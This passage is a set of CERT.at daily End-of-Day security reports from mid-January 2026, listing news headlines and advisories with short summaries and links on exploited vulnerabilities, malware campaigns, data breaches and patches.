=====================
= End-of-Day report =
=====================
Timeframe: Thursday 15-01-2026 18:00 − Friday 16-01-2026 18:00
Handler: Alexander Riepl
Co-Handler: Felician Fuchs
=====================
= News =
=====================
∗∗∗ Root access via bit flip: flaw in AMD CPUs enables break-ins into cloud VMs ∗∗∗
---------------------------------------------
A new attack technique named Stackwarp lets attackers hijack virtual machines via AMD CPUs. Cloud environments are particularly at risk.
---------------------------------------------
https://www.golem.de/news/per-bitflip-zum-root-zugriff-luecke-in-amd-cpus-e…
∗∗∗ AWS CodeBuild Misconfiguration Exposed GitHub Repos to Potential Supply Chain Attacks ∗∗∗
---------------------------------------------
A critical misconfiguration in Amazon Web Services (AWS) CodeBuild could have allowed complete takeover of the cloud service provider's own GitHub repositories, including its AWS JavaScript SDK, putting every AWS environment at risk.
---------------------------------------------
https://thehackernews.com/2026/01/aws-codebuild-misconfiguration-exposed.ht…
∗∗∗ Five Malicious Chrome Extensions Impersonate Workday and NetSuite to Hijack Accounts ∗∗∗
---------------------------------------------
Cybersecurity researchers have discovered five new malicious Google Chrome web browser extensions that masquerade as human resources (HR) and enterprise resource planning (ERP) platforms like Workday, NetSuite, and SuccessFactors to take control of victim accounts.
---------------------------------------------
https://thehackernews.com/2026/01/five-malicious-chrome-extensions.html
∗∗∗ Chinese spies used Maduro's capture as a lure to phish US govt agencies ∗∗∗
---------------------------------------------
What's next for Venezuela? Click on the file and see. What policy wonk wouldn't want to click on an attachment promising to unveil US plans for Venezuela? Chinese cyberspies used just such a lure to target US government agencies and policy-related organizations in a phishing campaign that began just days after an American military operation captured Venezuelan President Nicolás Maduro.
---------------------------------------------
https://go.theregister.com/feed/www.theregister.com/2026/01/15/chinese_spie…
∗∗∗ Bankrupt scooter startup left one private key to rule them all ∗∗∗
---------------------------------------------
An Estonian e-scooter owner locked out of his own ride after the manufacturer went bust did what any determined engineer might do. He reverse-engineered it, and claims he ended up discovering the master key that unlocks every scooter the company ever sold.
---------------------------------------------
https://www.theregister.com/2026/01/16/bankrupt_scooter_startup_key/
∗∗∗ RondoDox botnet linked to large-scale exploit of critical HPE OneView bug ∗∗∗
---------------------------------------------
Check Point observes 40K+ attack attempts in our hours, with government organizations under fire. A critical HPE OneView flaw is now being exploited at scale, with Check Point tying mass, automated attacks to the RondoDox botnet.
---------------------------------------------
https://www.theregister.com/2026/01/16/rondodox_botnet_hpe_oneview/
∗∗∗ German cops add Black Basta boss to EU most-wanted list ∗∗∗
---------------------------------------------
Ransomware kingpin who escaped Armenian custody is believed to be lying low back home. German cops have added Russian national Oleg Evgenievich Nefekov to their list of most-wanted criminals for his services to ransomware.
---------------------------------------------
https://www.theregister.com/2026/01/16/black_basta_boss_wanted/
∗∗∗ Patch now! Critical Cisco flaw exploited since December 2025 ∗∗∗
---------------------------------------------
Attackers are compromising Cisco Secure Email Gateway and Secure Email and Web Manager through a root-level vulnerability. Security updates are now available.
---------------------------------------------
https://www.heise.de/news/Jetzt-patchen-Kritische-Cisco-Luecke-seit-Dezembe…
∗∗∗ The learning threat: Predator spyware is more sophisticated than thought ∗∗∗
---------------------------------------------
Intellexa's Predator spyware extracts valuable data even from failed infection attempts and specifically hunts IT security researchers.
---------------------------------------------
https://www.heise.de/news/Die-lernende-Bedrohung-Predator-Spyware-ist-raffi…
∗∗∗ Chinese hackers targeting ‘high value’ North American critical infrastructure, Cisco says ∗∗∗
---------------------------------------------
Chinese hackers successfully breached multiple critical infrastructure organizations in North America over the last year using a combination of compromised credentials and exploitable servers, researchers at Cisco Talos found.
---------------------------------------------
https://therecord.media/china-hackers-apt-cisco-talos
∗∗∗ Canadian investment regulator confirms hackers hit 750,000 investors ∗∗∗
---------------------------------------------
The nongovernmental Canadian Investment Regulatory Organization, which oversees the country's debt and equity marketplaces as well as some financial institutions, released details about an August 2025 data breach.
---------------------------------------------
https://therecord.media/canada-ciro-investing-regulator-confirms-data-breach
∗∗∗ CVE-2025-55182: React2Shell Analysis, Proof-of-Concept Chaos, and In-the-Wild Exploitation ∗∗∗
---------------------------------------------
CVE-2025-55182 is a CVSS 10.0 pre-authentication RCE affecting React Server Components. Amid the flood of fake proof-of-concept exploits, scanners, exploits, and widespread misconceptions, this technical analysis intends to cut through the noise.
---------------------------------------------
https://www.trendmicro.com/en_us/research/25/l/CVE-2025-55182-analysis-poc-…
∗∗∗ New PayPal Scam Sends Verified Invoices With Fake Support Numbers ∗∗∗
---------------------------------------------
Scammers are using verified PayPal invoices to launch callback phishing attacks. Learn how the "Alexzander" invoice bypasses Google filters.
---------------------------------------------
https://hackread.com/paypal-scam-verified-invoices-fake-support-numbers/
∗∗∗ Operation Endgame: Dutch Police Arrest Alleged AVCheck Operator ∗∗∗
---------------------------------------------
Dutch police arrest the alleged AVCheck operator at Schiphol as part of Operation Endgame, a global effort targeting malware services and cybercrime.
---------------------------------------------
https://hackread.com/operation-endgame-dutch-police-arrest-avcheck-operator/
∗∗∗ Closing the Door on Net-NTLMv1: Releasing Rainbow Tables to Accelerate Protocol Deprecation ∗∗∗
---------------------------------------------
Mandiant is publicly releasing a comprehensive dataset of Net-NTLMv1 rainbow tables to underscore the urgency of migrating away from this outdated protocol. Despite Net-NTLMv1 being deprecated and known to be insecure for over two decades—with cryptanalysis dating back to 1999—Mandiant consultants continue to identify its use in active environments.
---------------------------------------------
https://cloud.google.com/blog/topics/threat-intelligence/net-ntlmv1-depreca…
∗∗∗ The reporting portal in the AWS cloud: why, BSI? ∗∗∗
---------------------------------------------
It is good that the BSI offers a new portal for IT security. But does it really have to run on the AWS cloud, asks Tobias Glemser.
---------------------------------------------
https://heise.de/-11142071
∗∗∗ How to Use Pareto Principle to Fine-Tune Alerts and Reduce False Positives Wisely ∗∗∗
---------------------------------------------
False positives were not only consuming analyst time — they were also diluting attention and slowing response on the few alerts that actually mattered.
---------------------------------------------
https://detect.fyi/how-to-use-pareto-principle-to-fine-tune-alerts-and-redu…
=====================
= Vulnerabilities =
=====================
∗∗∗ Hackers exploit Modular DS WordPress plugin flaw for admin access ∗∗∗
---------------------------------------------
Hackers are actively exploiting a maximum severity flaw in the Modular DS WordPress plugin that allows them to bypass authentication remotely and access the vulnerable sites with admin-level privileges.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/hackers-exploit-modular-ds-w…
∗∗∗ Critical flaw lets hackers track, eavesdrop via Bluetooth audio devices ∗∗∗
---------------------------------------------
A critical vulnerability in Google's Fast Pair protocol can allow attackers to hijack Bluetooth audio accessories like wireless headphones and earbuds, track users, and eavesdrop on their conversations.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/critical-whisperpair-flaw-le…
∗∗∗ VU#383552: thelibrarian does not secure its interface, allowing for access to internal system data ∗∗∗
---------------------------------------------
Multiple vulnerabilities were discovered in The Librarian, an AI-powered personal assistant tool provided by the company TheLibrarian.io. The Librarian can be used to manage personal email, calendar, documents, and other information through external services, such as Gmail and Google Drive, and also summarize meetings and schedule emails.
---------------------------------------------
https://kb.cert.org/vuls/id/383552
∗∗∗ VU#650657: Livewire Filemanager contains an insecure .php component that allows for unauthenticated RCE in Laravel Products ∗∗∗
---------------------------------------------
A vulnerability, tracked as CVE-2025-14894, has been discovered within Livewire Filemanager, a tool designed for usage within Laravel applications. The Livewire Filemanager tool allows for users to upload various files, including PHP files, and host them within the Laravel application.
---------------------------------------------
https://kb.cert.org/vuls/id/650657
∗∗∗ Juniper Networks: numerous security updates for various products ∗∗∗
---------------------------------------------
Juniper Networks has released security updates for numerous products. IT admins should apply them promptly.
---------------------------------------------
https://www.heise.de/news/Juniper-Networks-Zahlreiche-Sicherheitsupdates-fu…
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (gnupg2), Debian (firefox-esr), Oracle (cups, gnupg2, libpq, net-snmp, postgresql, postgresql:15, postgresql:16, transfig, and vsftpd), Red Hat (firefox), SUSE (apache2, curl, firefox, gpg2, hawk2, libcryptopp-devel, openCryptoki, python310, python311-urllib3, rke2, squid, and tomcat), and Ubuntu (cpp-httplib, git, python-apt, and simgear).
---------------------------------------------
https://lwn.net/Articles/1054683/
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 14-01-2026 18:00 − Thursday 15-01-2026 18:00
Handler: Alexander Riepl
Co-Handler: Felician Fuchs
=====================
= News =
=====================
∗∗∗ Exploit code public for critical FortiSIEM command injection flaw ∗∗∗
---------------------------------------------
Technical details and a public exploit have been published for a critical vulnerability affecting Fortinet's Security Information and Event Management (SIEM) solution that could be leveraged by a remote, unauthenticated attacker to execute commands or code.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/exploit-code-public-for-crit…
∗∗∗ Critical flaw lets hackers track, eavesdrop via Bluetooth audio devices ∗∗∗
---------------------------------------------
A critical vulnerability in Google's Fast Pair protocol can allow attackers to hijack Bluetooth audio accessories like wireless headphones and earbuds, track users, and eavesdrop on their conversations.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/critical-flaw-lets-hackers-t…
∗∗∗ Most Severe AI Vulnerability to Date Hits ServiceNow ∗∗∗
---------------------------------------------
The ITSM giant tacked agentic AI onto a largely unguarded legacy chatbot, exposing customers' data and connected systems.
---------------------------------------------
https://www.darkreading.com/remote-workforce/ai-vulnerability-servicenow
∗∗∗ January Patch Tuesday: Windows updates break remote sign-in ∗∗∗
---------------------------------------------
Some users have recently been having problems signing in to Azure Virtual Desktop or Windows 365 with the Windows App. A fix is in the works.
---------------------------------------------
https://www.golem.de/news/januar-patchday-windows-updates-machen-windows-ap…
∗∗∗ Ransomware boss wanted: this man is said to be the leader of Black Basta ∗∗∗
---------------------------------------------
Interpol, Europol and the BKA are searching for the boss of the Black Basta ransomware group, which has harmed more than 100 organizations in Germany alone.
---------------------------------------------
https://www.golem.de/news/ransomware-boss-gesucht-dieser-mann-soll-der-anfu…
∗∗∗ A 0-click exploit chain for the Pixel 9 Part 1: Decoding Dolby ∗∗∗
---------------------------------------------
Over the past few years, several AI-powered features have been added to mobile phones that allow users to better search and understand their messages. One effect of this change is increased 0-click attack surface, as efficient analysis often requires message media to be decoded before the message is opened by the user. One such feature is audio transcription.
---------------------------------------------
https://projectzero.google/2026/01/pixel-0-click-part-1.html
∗∗∗ A 0-click exploit chain for the Pixel 9 Part 2: Cracking the Sandbox with a Big Wave ∗∗∗
---------------------------------------------
With the advent of a potential Dolby Unified Decoder RCE exploit, it seemed prudent to see what kind of Linux kernel drivers might be accessible from the resulting userland context, the mediacodec context.
---------------------------------------------
https://projectzero.google/2026/01/pixel-0-click-part-2.html
∗∗∗ A 0-click exploit chain for the Pixel 9 Part 3: Where do we go from here? ∗∗∗
---------------------------------------------
While our previous two blog posts provided technical recommendations for increasing the effort required by attackers to develop 0-click exploit chains, our experience finding, reporting and exploiting these vulnerabilities highlighted some broader issues in the Android ecosystem. This post describes the problems we encountered and recommendations for improvement.
---------------------------------------------
https://projectzero.google/2026/01/pixel-0-click-part-3.html
∗∗∗ Researchers Null-Route Over 550 Kimwolf and Aisuru Botnet Command Servers ∗∗∗
---------------------------------------------
The Black Lotus Labs team at Lumen Technologies said it null-routed traffic to more than 550 command-and-control (C2) nodes associated with the AISURU/Kimwolf botnet since early October 2025.
---------------------------------------------
https://thehackernews.com/2026/01/kimwolf-botnet-infected-over-2-million.ht…
∗∗∗ Verizon Outage Knocks Out US Mobile Service, Including Some 911 Calls ∗∗∗
---------------------------------------------
A major Verizon outage appeared to impact customers across the United States starting around noon ET on Wednesday. Calls to Verizon customers from other carriers may also be impacted.
---------------------------------------------
https://www.wired.com/story/verizon-outage-knocks-out-us-mobile-service-inc…
∗∗∗ Raid in Germany: authorities shut down cybercrime hoster RedVDS ∗∗∗
---------------------------------------------
International investigators and Microsoft have struck a blow against the infrastructure of the cybercrime hoster RedVDS. Some of the servers were located in Germany.
---------------------------------------------
https://www.heise.de/news/Razzia-in-Deutschland-Behoerden-machen-Cybercrime…
∗∗∗ Chrome: Google cuts support for older macOS ∗∗∗
---------------------------------------------
macOS 12, alias Monterey, released less than five years ago, will soon be dropped by Google's browser. Its security vulnerabilities will remain unpatched.
---------------------------------------------
https://www.heise.de/news/Chrome-Google-kappt-Support-fuer-aelteres-macOS-1…
∗∗∗ curl: project ends bug bounty program ∗∗∗
---------------------------------------------
curl maintainer Daniel Stenberg has announced the end of the bug bounty program. Useless AI-generated reports apparently got out of hand.
---------------------------------------------
https://www.heise.de/news/curl-Projekt-beendet-Bug-Bounty-Programm-11142345…
∗∗∗ Criminals imitate bank phone numbers: beware of spoofing ∗∗∗
---------------------------------------------
Criminals are constantly looking for new methods to obtain account data. Unfortunately, they have found one: with spoofing, they fake the phone number of banks and thereby gain the trust of their victims.
---------------------------------------------
https://www.watchlist-internet.at/news/kriminelle-imitieren-banknummern-spo…
∗∗∗ Microsoft disrupts RedVDS cybercrime platform behind $40 million in scam losses ∗∗∗
---------------------------------------------
Microsoft and law enforcement partners took down a popular cybercriminal subscription service called RedVDS that was used to enable more than $40 million in fraud losses in the United States alone.
---------------------------------------------
https://therecord.media/microsoft-redvds-cybercrime-scam
∗∗∗ UAT-8837 targets critical infrastructure sectors in North America ∗∗∗
---------------------------------------------
Cisco Talos is closely tracking UAT-8837, a threat actor we assess with medium confidence is a China-nexus advanced persistent threat (APT) actor.
---------------------------------------------
https://blog.talosintelligence.com/uat-8837/
∗∗∗ GhostPoster Browser Malware Hid for 5 Years With 840,000 Installs ∗∗∗
---------------------------------------------
Researchers uncover a 5-year malware campaign using browser extensions on Chrome, Firefox and Edge, relying on hidden payloads and shared infrastructure.
---------------------------------------------
https://hackread.com/ghostposter-browser-malware-840000-installs/
∗∗∗ Closing the Door on Net-NTLMv1: Releasing Rainbow Tables to Accelerate Protocol Deprecation ∗∗∗
---------------------------------------------
Mandiant is publicly releasing a comprehensive dataset of Net-NTLMv1 rainbow tables to underscore the urgency of migrating away from this outdated protocol. Despite Net-NTLMv1 being deprecated and known to be insecure for over two decades—with cryptanalysis dating back to 1999—Mandiant consultants continue to identify its use in active environments.
---------------------------------------------
https://cloud.google.com/blog/topics/threat-intelligence/net-ntlmv1-depreca…
∗∗∗ New Remcos Campaign Distributed Through Fake Shipping Document ∗∗∗
---------------------------------------------
FortiGuard Labs discovered a new phishing campaign in the wild. The campaign delivers a new variant of Remcos, a commercial lightweight remote access tool (RAT) with a wide range of capabilities, including system resource management, remote surveillance, network management, and Remcos agent management.
---------------------------------------------
https://feeds.fortinet.com/~/940295429/0/fortinet/blogs~New-Remcos-Campaign…
∗∗∗ I’m The Captain Now: Hijacking a global ocean supply chain network ∗∗∗
---------------------------------------------
There’s a good chance you have never heard of BLUVOYIX or Bluspark Global, and that’s ok! Not every company that powers global commerce is a household name. Despite their low profile, companies like these have an important role to play in keeping the global supply chain running in the background. Breaches at companies you haven’t heard of can often have the worst impacts.
---------------------------------------------
https://eaton-works.com/2026/01/14/bluspark-bluvoyix-hack/
∗∗∗ Malicious Chrome Extension Steals MEXC API Keys for Account Takeover ∗∗∗
---------------------------------------------
A malicious Chrome extension steals newly created MEXC API keys, exfiltrates them to Telegram, and enables full account takeover with trading and withdrawal rights.
---------------------------------------------
https://socket.dev/blog/malicious-chrome-extension-steals-mexc-api-keys
=====================
= Vulnerabilities =
=====================
∗∗∗ Critical WordPress Modular DS Plugin Flaw Actively Exploited to Gain Admin Access ∗∗∗
---------------------------------------------
A maximum-severity security flaw in a WordPress plugin called Modular DS has come under active exploitation in the wild, according to Patchstack. The vulnerability, tracked as CVE-2026-23550 (CVSS score: 10.0), has been described as a case of unauthenticated privilege escalation impacting all versions of the plugin prior to and including 2.5.1. It has been patched in version 2.5.2.
---------------------------------------------
https://thehackernews.com/2026/01/critical-wordpress-modular-ds-plugin.html
∗∗∗ Role Delegation - Moderately critical - Access bypass - SA-CONTRIB-2026-002 ∗∗∗
---------------------------------------------
This module allows site administrators to grant specific roles the authority to assign selected roles to users, without them needing the "administer permissions" permission. The module contains an access bypass vulnerability when used in combination with the Views Bulk Operations module. A user with the ability to delegate a role is also able to assign the administrator role, including to their own user.
---------------------------------------------
https://www.drupal.org/sa-contrib-2026-002
∗∗∗ Group invite - Moderately critical - Access bypass - SA-CONTRIB-2026-001 ∗∗∗
---------------------------------------------
This module allows group managers to invite people into their group. The module doesn't sufficiently check access under certain circumstances, allowing unauthorized users to access the group's content.
---------------------------------------------
https://www.drupal.org/sa-contrib-2026-001
∗∗∗ Microsoft Entra ID SSO Login - Critical - Access bypass - SA-CONTRIB-2026-005 ∗∗∗
---------------------------------------------
This module enables Drupal sites to authenticate users via Microsoft Entra ID (formerly Azure AD) using OAuth 2.0. The module doesn't sufficiently validate API responses from Microsoft allowing complete account takeover of any user, including site administrators, without requiring any credentials or access to the target's email account.
---------------------------------------------
https://www.drupal.org/sa-contrib-2026-005
∗∗∗ Fortinet: Heap-based buffer overflow in cw_acd daemon (FortiOS, FortiSASE, FortiSwitchManager) ∗∗∗
---------------------------------------------
A heap-based buffer overflow vulnerability [CWE-122] in FortiOS and FortiSwitchManager cw_acd daemon may allow a remote unauthenticated attacker to execute arbitrary code or commands via specifically crafted requests. CVE-2025-25249 / CVSSv3 Score 7.4
---------------------------------------------
https://fortiguard.fortinet.com/psirt/FG-IR-25-084
∗∗∗ Attackers can force Palo Alto firewalls into maintenance mode ∗∗∗
---------------------------------------------
Under certain conditions, attackers can exploit a vulnerability in PAN-OS to attack Palo Alto Networks firewalls. According to the IT security company, there are no indications of attacks so far.
---------------------------------------------
https://www.heise.de/news/Angreifer-koennen-Palo-Alto-Firewalls-in-Wartungs…
∗∗∗ CVE-2026-0227 PAN-OS: Firewall Denial of Service (DoS) in GlobalProtect Gateway and Portal (Severity: HIGH) ∗∗∗
---------------------------------------------
A vulnerability in Palo Alto Networks PAN-OS software enables an unauthenticated attacker to cause a denial of service (DoS) to the firewall. Repeated attempts to trigger this issue result in the firewall entering maintenance mode.
---------------------------------------------
https://security.paloaltonetworks.com/CVE-2026-0227
∗∗∗ Security Vulnerabilities fixed in Thunderbird 140.7 ∗∗∗
---------------------------------------------
https://www.mozilla.org/en-US/security/advisories/mfsa2026-05/
∗∗∗ Security Vulnerabilities fixed in Thunderbird 147 ∗∗∗
---------------------------------------------
https://www.mozilla.org/en-US/security/advisories/mfsa2026-04/
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 13-01-2026 18:00 − Wednesday 14-01-2026 18:30
Handler: Felician Fuchs
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Target employees confirm leaked source code is authentic ∗∗∗
---------------------------------------------
Multiple current and former Target employees confirmed that leaked source code samples posted by a threat actor match real internal systems. The company also rolled out an "accelerated" lockdown of its Git server, requiring VPN access, a day after being contacted by BleepingComputer.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/target-employees-confirm-lea…
∗∗∗ Microsoft: Windows 365 update blocks access to Cloud PC sessions ∗∗∗
---------------------------------------------
Microsoft confirmed that a recent Windows 365 update is blocking customers from accessing their Microsoft 365 Cloud PC sessions.
---------------------------------------------
https://www.bleepingcomputer.com/news/microsoft/microsoft-windows-365-updat…
∗∗∗ Cloud marketplace Pax8 accidentally exposes data on 1,800 MSP partners ∗∗∗
---------------------------------------------
Cloud marketplace and distributor Pax8 has confirmed that it mistakenly sent an email to fewer than 40 UK-based partners containing a spreadsheet with internal business information, including MSP customer and Microsoft licensing data.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/cloud-marketplace-pax8-accid…
∗∗∗ Reprompt attack let hackers hijack Microsoft Copilot sessions ∗∗∗
---------------------------------------------
Researchers identified an attack method dubbed "Reprompt" that could allow attackers to infiltrate a user's Microsoft Copilot session and issue commands to exfiltrate sensitive data.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/reprompt-attack-let-hackers-…
∗∗∗ ConsentFix debrief: Insights from the new OAuth phishing attack ∗∗∗
---------------------------------------------
ConsentFix is an OAuth phishing technique abusing browser-based authorization flows to hijack Microsoft accounts. Push Security shares new insights from continued tracking, community research, and evolving attacker techniques.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/consentfix-debrief-insights-…
∗∗∗ Microsoft updates Windows DLL that triggered security alerts ∗∗∗
---------------------------------------------
Microsoft has resolved a known issue that was causing security applications to incorrectly flag a core Windows component, the company said in a service alert posted this week.
---------------------------------------------
https://www.bleepingcomputer.com/news/microsoft/microsoft-updates-windows-d…
∗∗∗ Without authentication: Broadcom flaw lets attackers take down entire Wi-Fi networks ∗∗∗
---------------------------------------------
Numerous Wi-Fi networks based on Broadcom chipsets can be taken down with a single packet. Attackers do not need a key to do so.
---------------------------------------------
https://www.golem.de/news/ohne-authentifizierung-broadcom-luecke-laesst-ang…
∗∗∗ Corrupting LLMs Through Weird Generalizations ∗∗∗
---------------------------------------------
Abstract: LLMs are useful because they generalize so well. But can you have too much of a good thing? We show that a small amount of finetuning in narrow contexts can dramatically shift behavior outside those contexts.
---------------------------------------------
https://www.schneier.com/blog/archives/2026/01/corrupting-llms-through-weir…
∗∗∗ Malware Intercepts Googlebot via IP-Verified Conditional Logic ∗∗∗
---------------------------------------------
Some attackers are increasingly moving away from simple redirects in favor of more “selective” methods of payload delivery. This approach filters out regular human visitors, allowing attackers to serve malicious content to search engine crawlers while remaining invisible to the website owner.
---------------------------------------------
https://blog.sucuri.net/2026/01/malware-intercepts-googlebot-via-ip-verifie…
∗∗∗ Malicious Chrome Extension Steals MEXC API Keys by Masquerading as Trading Tool ∗∗∗
---------------------------------------------
Cybersecurity researchers have disclosed details of a malicious Google Chrome extension that's capable of stealing API keys associated with MEXC, a centralized cryptocurrency exchange (CEX) available in over 170 countries, while masquerading as a tool to automate trading on the platform.
---------------------------------------------
https://thehackernews.com/2026/01/malicious-chrome-extension-steals-mexc.ht…
∗∗∗ New Research: 64% of 3rd-Party Applications Access Sensitive Data Without Justification ∗∗∗
---------------------------------------------
Research analyzing 4,700 leading websites reveals that 64% of third-party applications now access sensitive data without business justification, up from 51% in 2024. Government sector malicious activity spiked from 2% to 12.9%, while 1 in 7 Education sites show active compromise.
---------------------------------------------
https://thehackernews.com/2026/01/new-research-64-of-3rd-party.html
∗∗∗ Hackers Exploit c-ares DLL Side-Loading to Bypass Security and Deploy Malware ∗∗∗
---------------------------------------------
Security experts have disclosed details of an active malware campaign that's exploiting a DLL side-loading vulnerability in a legitimate binary associated with the open-source c-ares library to bypass security controls and deliver a wide range of commodity trojans and stealers.
---------------------------------------------
https://thehackernews.com/2026/01/hackers-exploit-c-ares-dll-side-loading.h…
∗∗∗ Interrail reports data leak: ID document data also affected ∗∗∗
---------------------------------------------
Data was allegedly exfiltrated from Eurail. The provider also issues Interrail passes on behalf of the German, Austrian and Swiss railways.
---------------------------------------------
https://www.heise.de/news/Interrail-meldet-Datenleck-Auch-Ausweisdaten-betr…
∗∗∗ Criticism of GnuPG and its handling of reported vulnerabilities ∗∗∗
---------------------------------------------
The problems in the PGP implementation GnuPG demonstrated at 39C3 drew wide-ranging criticism of GnuPG's handling of them, but also of PGP as a whole.
---------------------------------------------
https://www.heise.de/hintergrund/Kritik-an-GnuPG-und-seinem-Umgang-mit-geme…
∗∗∗ Malware scheme: job offers slip malicious repositories to developers ∗∗∗
---------------------------------------------
Developers now need to be careful with job offers. Criminals are trying to distribute infostealers through them.
---------------------------------------------
https://www.heise.de/news/Malware-Masche-Jobangebote-jubeln-Entwicklern-boe…
∗∗∗ How real software downloads can hide remote backdoors ∗∗∗
---------------------------------------------
Attackers use legitimate open-source software as cover, relying on user trust to compromise systems. We dive into an example.
---------------------------------------------
https://www.malwarebytes.com/blog/threat-intel/2026/01/how-real-software-do…
∗∗∗ Instagram denies hack after mass password-reset emails ∗∗∗
---------------------------------------------
Reports had previously circulated about stolen data from 17 million users. The company disputes this and advises ignoring the emails.
---------------------------------------------
https://www.derstandard.at/story/3000000303975/instagram-dementiert-hack-na…
∗∗∗ Ransomware: Tactical Evolution Fuels Extortion Epidemic ∗∗∗
---------------------------------------------
New whitepaper reveals record number of attacks as threat landscape evolves with new players and new tactics.
---------------------------------------------
https://www.security.com/threat-intelligence/ransomware-extortion-epidemic
∗∗∗ More than 40 countries impacted by North Korea IT worker scams, crypto thefts ∗∗∗
---------------------------------------------
Eleven countries led a session at the UN headquarters in New York centered around a 140-page report released last fall that covered North Korea’s extensive cyber-focused efforts to fund its nuclear and ballistic weapons program.
---------------------------------------------
https://therecord.media/40-countries-impacted-nk-it-thefts-united-nations
∗∗∗ Poland says it repelled major cyberattack on power grid, blames Russia ∗∗∗
---------------------------------------------
Poland narrowly avoided a large-scale power outage by thwarting what officials described as the most serious cyberattack on its energy infrastructure in years.
---------------------------------------------
https://therecord.media/poland-cyberattack-grid-russia
∗∗∗ Western cyber agencies warn about threats to industrial operational technology ∗∗∗
---------------------------------------------
New guidance issued by Britain's National Cyber Security Centre (NCSC), a part of signals and cyber intelligence agency GCHQ, sets out how organizations should securely connect equipment such as industrial control systems, sensors and other critical services.
---------------------------------------------
https://therecord.media/cyber-agencies-warn-of-industrial-system-threats
∗∗∗ Telegram to Add Warning for Proxy Links After IP Leak Concerns ∗∗∗
---------------------------------------------
Telegram will add a warning for proxy links after reports showed they can expose user IP addresses with a single click, bypassing VPN or privacy settings.
---------------------------------------------
https://hackread.com/telegram-add-warning-proxy-links-ip-leak/
∗∗∗ Hacker Claims Full Breach of Russia’s Max Messenger, Threatens Public Leak ∗∗∗
---------------------------------------------
A hacker claims a full breach of Russia’s Max Messenger, threatening to leak user data and backend systems if demands are not met.
---------------------------------------------
https://hackread.com/hacker-russia-max-messenger-breach-data-leak/
∗∗∗ Secure Connectivity Principles for Operational Technology (OT) ∗∗∗
---------------------------------------------
CISA and the UK National Cyber Security Centre (NCSC-UK), in collaboration with federal and international partners, have released Secure Connectivity Principles for Operational Technology (OT) guidance to help asset owners address increasing business and regulatory pressures for connectivity into operational technology (OT) networks.
---------------------------------------------
https://www.cisa.gov/resources-tools/resources/secure-connectivity-principl…
∗∗∗ Unpatchable Vulnerabilities of Kubernetes: CVE-2020-8554 ∗∗∗
---------------------------------------------
This blog is the first part of a mini-series looking at the four unpatchable CVEs in every Kubernetes cluster.
---------------------------------------------
https://securitylabs.datadoghq.com/articles/unpatchable-kubernetes-vulnerab…
∗∗∗ Wireless-(in)Fidelity: Pentesting Wi-Fi in 2025 ∗∗∗
---------------------------------------------
Despite the advancements that have been made in Wi-Fi security with the arrival of WPA3, some misconfigurations and legacy protocols still remain. In this blogpost, we share insights into Wi-Fi related findings encountered during penetration testing engagements.
---------------------------------------------
https://www.synacktiv.com/en/publications/wireless-infidelity-pentesting-wi…
=====================
= Vulnerabilities =
=====================
∗∗∗ Multiple vulnerabilities in EATON UPS Companion ∗∗∗
---------------------------------------------
EATON UPS Companion provided by Eaton contains multiple vulnerabilities.
---------------------------------------------
https://jvn.jp/en/jp/JVN48187396/
∗∗∗ Microsoft Patch Tuesday: attacks on Windows and Windows Server observed ∗∗∗
---------------------------------------------
Important security updates have been released for Office, Windows and other products. Attackers are already exploiting one of the vulnerabilities. Further attacks may be imminent.
---------------------------------------------
https://www.heise.de/news/Patchday-Microsoft-Angreifer-spionieren-Speicherb…
∗∗∗ Adobe Patch Tuesday: code-execution vulnerabilities threaten Dreamweaver and others ∗∗∗
---------------------------------------------
Important security updates fix, among other products, Adobe ColdFusion and InDesign.
---------------------------------------------
https://www.heise.de/news/Patchday-Adobe-Schadcode-Luecken-bedrohen-Dreamwe…
∗∗∗ Security updates for Wednesday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (sssd), Debian (linux-6.1 and python-parsl), Fedora (chezmoi, complyctl, composer, and firefox), Oracle (kernel), Red Hat (buildah, libpq, podman, postgresql, postgresql16, postgresql:13, postgresql:15, and postgresql:16), SUSE (avahi, curl, ffmpeg-4, ffmpeg-7, firefox, istioctl, k6, kubelogin, libmicrohttpd, libpcap-devel, libpng16, libtasn1-6-32bit, matio, ovmf, python-tornado6, python311-Authlib, and teleport), and Ubuntu (angular.js, python-urllib3, and webkit2gtk).
---------------------------------------------
https://lwn.net/Articles/1054167/
∗∗∗ Mitigating Denial-of-Service Vulnerability from Unrecoverable Stack Space Exhaustion for React, Next.js, and APM Users ∗∗∗
---------------------------------------------
This bug highlights how deeply async_hooks has become embedded in the Node.js ecosystem. What started as a low-level debugging API is now a critical dependency for React Server Components, Next.js, every major APM tool, and any code using AsyncLocalStorage.
---------------------------------------------
https://nodejs.org/en/blog/vulnerability/january-2026-dos-mitigation-async-…
∗∗∗ F5: K000159546, Python vulnerability CVE-2024-5642 ∗∗∗
---------------------------------------------
https://my.f5.com/manage/s/article/K000159546
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/
=====================
= End-of-Day report =
=====================
Timeframe: Monday 12-01-2026 18:00 − Tuesday 13-01-2026 18:00
Handler: Felician Fuchs
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Target's dev server offline after hackers claim to steal source code ∗∗∗
---------------------------------------------
Hackers are claiming to be selling internal source code belonging to Target Corporation, after publishing what appears to be a sample of stolen code repositories on a public software development platform. After BleepingComputer notified Target, the files were taken offline and the retailer's developer Git server was inaccessible.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/targets-dev-server-offline-a…
∗∗∗ CISA orders feds to patch Gogs RCE flaw exploited in zero-day attacks ∗∗∗
---------------------------------------------
CISA has ordered government agencies to secure their systems against a high-severity Gogs vulnerability that was exploited in zero-day attacks.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/cisa-orders-feds-to-patch-go…
∗∗∗ Facebook login thieves now using browser-in-browser trick ∗∗∗
---------------------------------------------
